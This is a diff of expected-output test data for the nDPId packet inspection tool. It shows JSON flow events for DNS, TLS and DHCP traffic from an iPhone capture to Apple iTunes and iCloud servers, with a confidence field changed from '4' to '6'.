00705{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1582454599930,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":241,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":241,"pkt_l4_len":207,"thread_ts_msec":1582454599930,"pkt":"xGGLNYKpxiwDYGpkCABFAADjtQsAAEARP5zAqAIBwKgCEQA1\/jcAz3eX0zSBgAABAAUAAAAABHBsYXkGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAMOwAmCHBsYXktY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAOmACIEcGxheQZpdHVuZXMFYXBwbGUDY29tCWVkZ2VzdWl0ZcBUwGUABQABAAAAXgAUBWExODA2BGRzY2IGYWthbWFpwFTAkwABAAEAAAAOAARce00awJMAAQABAAAADgAEXHtNQA=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":340,"source":"iphone.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454599929,"flow_last_seen":1582454599930,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454599930,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":65079,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"play.itunes.apple.com","num_queries":1,"num_answers":5,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"92.123.77.26"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454599934,"flow_last_seen":1582454599934,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454599934,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":343,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1582454599934,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454599934,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGzmnAqAIRXHtNGsWbAbupO4D5AAAAALDC\/\/\/ZMQAAAgQFtAEDAwcBAQgKEd\/tTwAAAAAEAgAA"} 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":346,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1582454599967,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454599967,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGGW5ce00awKgCEQG7xZtUZWomqTuA+qBScSDQrwAAAgQFrAQCCAozMbcgEd\/tTwEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":351,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600080,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGznXAqAIRXHtNGsWbAbupO4D6VGVqJ4AQBAtsOAAAAQEIChHf7eAzMbcg"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":352,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454599934,"flow_last_seen":1582454600080,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600080,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":364,"source":"iphone.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454599934,"flow_last_seen":1582454600116,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600116,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"92.123.77.26","src_port":50587,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"play.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} 00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":1,"flow_last_seen":1582454600454,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":81,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":81,"pkt_l4_len":47,"thread_ts_msec":1582454600454,"pkt":"xiwDYGpkxGGLNYKpCABFAABDtJ8AAP8RgafAqAIRwKgCAfi9ADUAL+BtI4YBAAABAAAAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQAB"} -00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00779{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":419,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600454,"flow_last_seen":1582454600454,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":39,"flow_tot_l4_payload_len":39,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1582454600454,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00676{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_packet_id":2,"flow_last_seen":1582454600494,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":222,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":222,"pkt_l4_len":188,"thread_ts_msec":1582454600494,"pkt":"xGGLNYKpxiwDYGpkCABFAADQcdgAAEARguLAqAIBwKgCEQA1+L0AvB7yI4aBgAABAAQAAAAABHN5bmMGaXR1bmVzBWFwcGxlA2NvbQAAAQABwAwABQABAAAF1gAmCHN5bmMtY2RuDGl0dW5lcy1hcHBsZQNjb20GYWthZG5zA25ldADAMwAFAAEAAAWqABsGaXR1bmVzBWFwcGxlA2NvbQdlZGdla2V5wFTAZQAFAAEAABGWABgEZTY3MwVkc2NlOQpha2FtYWllZGdlwFTAjAABAAEAAAAYAARfZRg1"} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":422,"source":"iphone.pcap","alias":"nDPId-test","flow_id":50,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1582454600454,"flow_last_seen":1582454600494,"flow_idle_time":200000,"flow_min_l4_payload_len":39,"flow_max_l4_payload_len":180,"flow_tot_l4_payload_len":219,"flow_avg_l4_payload_len":109,"midstream":0,"thread_ts_msec":1582454600494,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63677,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.AppleiTunes","breed":"Fun","category":"Streaming"},"dns": {"query":"sync.itunes.apple.com","num_queries":1,"num_answers":4,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"95.101.24.53"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1582454600508,"flow_last_seen":1582454600508,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1582454600508,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":424,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":1,"flow_last_seen":1582454600508,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1582454600508,"pkt":"xiwDYGpkxGGLNYKpCABFAABAAABAAEAGAGXAqAIRX2UYNcWcAbsi3fgeAAAAALDC\/\/8YLgAAAgQFtAEDAwcBAQgKEd\/vhgAAAAAEAgAA"} 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":2,"flow_last_seen":1582454600541,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1582454600541,"pkt":"xGGLNYKpxiwDYGpkCABFAAA8AAAAADUGS2lfZRg1wKgCEQG7xZzFmLU\/It34H6BScSB2MAAAAgQFrAQCCAqI0z6tEd\/vhgEDAwc="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_packet_id":3,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1582454600545,"pkt":"xiwDYGpkxGGLNYKpCABFAAA0AABAAEAGAHHAqAIRX2UYNcWcAbsi3fgfxZi1QIAQBAsSJAAAAQEIChHf76yI0z6t"} -00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":45,"flow_state":"finished","flow_packets_processed":32,"flow_first_seen":1582454599225,"flow_last_seen":1582454600287,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7909,"flow_avg_l4_payload_len":247,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50584,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00691{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":47,"flow_state":"finished","flow_packets_processed":30,"flow_first_seen":1582454599740,"flow_last_seen":1582454600279,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":7913,"flow_avg_l4_payload_len":263,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50586,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598542,"flow_last_seen":1582454598582,"flow_idle_time":200000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":202,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":52852,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1582454598205,"flow_last_seen":1582454598247,"flow_idle_time":200000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":252,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"192.168.2.1","src_port":63143,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.AppleiCloud","breed":"Acceptable","category":"Web"}} -00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1582454553219,"flow_last_seen":1582454596366,"flow_idle_time":200000,"flow_min_l4_payload_len":300,"flow_max_l4_payload_len":300,"flow_tot_l4_payload_len":2100,"flow_avg_l4_payload_len":300,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"}} +00914{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":427,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1582454600508,"flow_last_seen":1582454600545,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":517,"flow_tot_l4_payload_len":517,"flow_avg_l4_payload_len":129,"midstream":0,"thread_ts_msec":1582454600545,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.2","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00955{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":432,"source":"iphone.pcap","alias":"nDPId-test","flow_id":51,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1582454600508,"flow_last_seen":1582454600580,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":1957,"flow_avg_l4_payload_len":326,"midstream":0,"thread_ts_msec":1582454600580,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"95.101.24.53","src_port":50588,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiTunes","breed":"Fun","category":"Streaming"},"tls": {"version":"TLSv1.3","client_requested_server_name":"sync.itunes.apple.com","ja3":"6fa3244afc6bb6f9fad207b6b52af26b","ja3s":"15af977ce25de452b96affa2addb1036","unsafe_cipher":0,"cipher":"TLS_AES_256_GCM_SHA384","alpn":"h2,http\/1.1","tls_supported_versions":"TLSv1.3,TLSv1.2,TLSv1.1,TLSv1"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":20,"flow_state":"finished","flow_packets_processed":25,"flow_first_seen":1582454598252,"flow_last_seen":1582454599058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":12558,"flow_avg_l4_payload_len":502,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.140","src_port":50575,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":29,"flow_state":"finished","flow_packets_processed":45,"flow_first_seen":1582454598587,"flow_last_seen":1582454600617,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":10875,"flow_avg_l4_payload_len":241,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.176.75","src_port":50580,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} +00692{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":500,"source":"iphone.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":77,"flow_first_seen":1582454598721,"flow_last_seen":1582454600748,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1440,"flow_tot_l4_payload_len":73228,"flow_avg_l4_payload_len":951,"midstream":0,"thread_ts_msec":1582454600748,"l3_proto":"ip4","src_ip":"192.168.2.17","dst_ip":"17.248.185.87","src_port":50581,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"TLS.AppleiCloud","breed":"Acceptable","category":"Web"}} 